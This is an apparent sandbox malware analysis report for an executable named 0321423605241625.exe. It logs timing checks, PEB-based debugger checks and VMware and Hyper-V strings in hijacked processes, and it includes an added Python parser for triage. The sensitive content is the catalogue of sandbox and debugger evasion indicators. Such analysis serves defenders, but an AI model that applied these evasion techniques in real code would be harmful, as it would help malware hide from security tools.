          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\0321423605241625.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX (20 identical hits)
          Source: C:\Users\user\Desktop\0321423605241625.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX (13 identical hits)
          Source: C:\Users\user\Desktop\0321423605241625.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (3 identical hits)
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX (10 identical hits)
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX (77 identical hits)
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX (71 identical hits)
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (3 identical hits)
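          Every evidence line in this report has the same shape: a source (a process image or a memory dump), the evidence kind, and its payload. The helper below is an added example, not part of the Joe Sandbox report and not code from the analysed sample. It parses lines in that shape, decodes the SetErrorMode flag names listed above into the documented Win32 SEM_* mask values, checks each RDTSC interceptor hit in the evasion section that follows for consistency between the two addresses and the listed instruction offsets, counts fs:[30h] (PEB pointer) reads per process, and pulls hypervisor vendor names out of memory strings. The sample lines are constructed from this report's evidence; the vendor keyword list is an assumption made for the example, and the observation that the "Hyper-V RAW" string sits next to mswsock.dll (a Winsock catalog entry present on ordinary Windows 10 hosts, so a weak indicator) is the editor's assessment, not the report's.

```python
"""Triage Joe Sandbox evidence lines ("Source: <process or dump> <kind>: <payload>").
Added example for this report: not Joe Sandbox code, not code from the sample.
SEM_* values are the documented Win32 SetErrorMode constants."""
import re
from collections import Counter, defaultdict

# winbase.h SetErrorMode flags; the report prints the names without the SEM_ prefix.
SEM_FLAGS = {
    "FAILCRITICALERRORS": 0x0001, "NOGPFAULTERRORBOX": 0x0002,
    "NOALIGNMENTFAULTEXCEPT": 0x0004, "NOOPENFILEERRORBOX": 0x8000,
}
VM_VENDORS = ("VMware", "VirtualBox", "VBox", "QEMU", "Hyper-V")  # assumption for this example

# The extracted report fuses source and kind ("...exeProcess information set"), so the
# whitespace between them is optional.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.(?:exe|dll|sdmp))\s*"
    r"(?P<kind>Process information set|RDTSC instruction interceptor|Code function"
    r"|Binary or memory string|Last function|API coverage|API call chain"
    r"|Process token adjusted|Process information queried):\s*(?P<body>.*)$"
)
RDTSC_RE = re.compile(r"First address:\s*([0-9A-Fa-f]+)\s*second address:\s*([0-9A-Fa-f]+)\s*instructions:\s*(.*)$")
# fs:[30h] is TEB.ProcessEnvironmentBlock on 32-bit Windows: step one of BeingDebugged / NtGlobalFlag checks.
PEB_RE = re.compile(r"fs:\[0*30h\]", re.IGNORECASE)

# Constructed sample: lines taken from this report, one of them in the fused extracted form.
SAMPLE = r"""
Source: C:\Users\user\Desktop\0321423605241625.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\0321423605241625.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000010418604 second address: 000000001041860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E276E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E56DE6 rdtsc
Source: explorer.exe, 00000002.00000000.387219526.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: Mwqrxeuz.exe, 00000003.00000002.542721424.000000000074D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
"""


def parse_line(line):
    """Split one evidence line into source, kind and payload; None if not an evidence line."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def decode_error_mode(body):
    """'FAILCRITICALERRORS | NOGPFAULTERRORBOX' -> 0x0003; an unknown flag name raises."""
    mask = 0
    for name in body.split("|"):
        name = name.strip()
        if name not in SEM_FLAGS:
            raise ValueError("unknown SetErrorMode flag: %r" % name)
        mask |= SEM_FLAGS[name]
    return mask


def check_rdtsc_pair(body):
    """Second address minus first must equal the offset of the last rdtsc in the listing
    (6 here: rdtsc, xor ecx,ecx and add ecx,eax are two bytes each)."""
    m = RDTSC_RE.search(body)
    if not m:
        return None
    first, second = int(m.group(1), 16), int(m.group(2), 16)
    listing = [(int(off, 16), mnem) for off, mnem in re.findall(r"0x([0-9A-Fa-f]+)\s+(\w+)", m.group(3))]
    rdtsc_offsets = [off for off, mnem in listing if mnem == "rdtsc"]
    delta = second - first
    return {"first": first, "second": second, "delta": delta,
            "between": [mnem for _, mnem in listing if mnem != "rdtsc"],
            "consistent": len(rdtsc_offsets) >= 2 and rdtsc_offsets[-1] - rdtsc_offsets[0] == delta}


def is_peb_read(body):
    return PEB_RE.search(body) is not None


def vm_vendor(body):
    """First hypervisor vendor keyword found in a memory string, else None."""
    low = body.lower()
    return next((v for v in VM_VENDORS if v.lower() in low), None)


def triage(report_text):
    """Aggregate evasion evidence per source process or dump."""
    out = {"error_mode": defaultdict(Counter), "rdtsc": [], "peb_reads": Counter(), "vm_strings": []}
    for line in report_text.splitlines():
        hit = parse_line(line)
        if hit is None:
            continue
        src, kind, body = hit["src"], hit["kind"], hit["body"]
        if kind == "Process information set":
            out["error_mode"][src][decode_error_mode(body)] += 1
        elif kind == "RDTSC instruction interceptor":
            pair = check_rdtsc_pair(body)
            if pair:
                out["rdtsc"].append((src, pair))
        elif kind == "Code function" and is_peb_read(body):
            out["peb_reads"][src] += 1
        elif kind == "Binary or memory string":
            vendor = vm_vendor(body)
            if vendor:
                out["vm_strings"].append((src, vendor))
    return out


if __name__ == "__main__":
    result = triage(SAMPLE)
    for proc, masks in result["error_mode"].items():
        print(proc, {hex(m): n for m, n in masks.items()})
    print("rdtsc:", result["rdtsc"], "\nPEB reads:", dict(result["peb_reads"]), "\nVM strings:", result["vm_strings"])
```

          Feed it the evidence section saved from the report; lines whose kind is not in the list are skipped rather than mis-parsed. The rdtsc consistency check matters when comparing reports: a pair whose address delta does not match the listed offsets is a sign the interceptor caught two unrelated rdtsc instructions rather than one timing probe.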

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000010418604 second address: 000000001041860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 000000001041899E second address: 00000000104189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 0000000002D88604 second address: 0000000002D8860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe RDTSC instruction interceptor: First address: 0000000002D8899E second address: 0000000002D889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E56DE6 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 4.2 %
          Source: C:\Users\user\Desktop\0321423605241625.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: 0_2_02175B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,
          Source: C:\Users\user\Desktop\0321423605241625.exe API call chain: ExitProcess graph end node (2 identical hits)
          Source: explorer.exe, 00000002.00000000.387219526.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.477730191.000000000ED50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.477730191.000000000ED50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}217G
          Source: explorer.exe, 00000002.00000000.312701350.00000000043B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 0321423605241625.exe, 00000000.00000002.307257682.000000000083B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0X
          Source: explorer.exe, 00000002.00000000.387219526.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: Mwqrxeuz.exe, 00000003.00000002.542721424.000000000074D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: 0321423605241625.exe, 00000000.00000002.307257682.000000000083B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW$
          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: 0_2_02186388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary,
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E56DE6 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06ECFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06EE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06EE0EA5 mov eax, dword ptr fs:[00000030h] (3 identical hits)
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06EAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h] (5 identical hits)
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h] (6 identical hits)
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06EDAE44 mov eax, dword ptr fs:[00000030h] (2 identical hits)
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06ECFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E1C600 mov eax, dword ptr fs:[00000030h] (3 identical hits)
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06ED1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E4A61C mov eax, dword ptr fs:[00000030h] (2 identical hits)
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED1C06 mov eax, dword ptr fs:[00000030h]
